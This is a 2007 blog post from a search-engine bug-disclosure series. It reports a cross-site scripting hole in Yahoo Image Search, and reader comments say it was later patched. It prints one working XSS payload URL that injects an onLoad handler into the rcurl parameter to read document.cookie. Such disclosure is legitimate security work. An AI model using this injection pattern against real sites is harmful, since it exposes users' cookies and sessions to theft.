« Добірка експлоітів
Місяць багів в Пошукових Системах: день другий »

MOSEB-02: Vulnerability at search.yahoo.com

18:36 02.06.2007

Next participant of the project is Yahoo search engine. It is 2nd of the top search engines in world.

The vulnerability is in Image Search of Yahoo! Search (http://images.search.yahoo.com). This Cross-Site Scripting hole I found 08.04.2007.

XSS:

The vulnerability is in rcurl parameter:
http://images.search.yahoo.com/search/images/view?rcurl=%22%20onLoad=%22javascript:alert(document.cookie)&rurl=test

Moral: searching for images can be dangerous.


This entry was posted on 18:36 02.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.

2 відповідей на “MOSEB-02: Vulnerability at search.yahoo.com”

  1. dasickis каже:
    Понеділок, 21:38 04.06.2007

    I think this has been patched.

  2. MustLive каже:
    Понеділок, 23:40 04.06.2007

    Yes, dasickis, it was patched alredy. I also rechecked this hole today and found that it has been fixed.

    Well done, Yahoo. You was not so lazy and found time for fixing. Keep watching guys, I’ll mention Yahoo some more during the month.

Leave a Reply

You must be logged in to post a comment.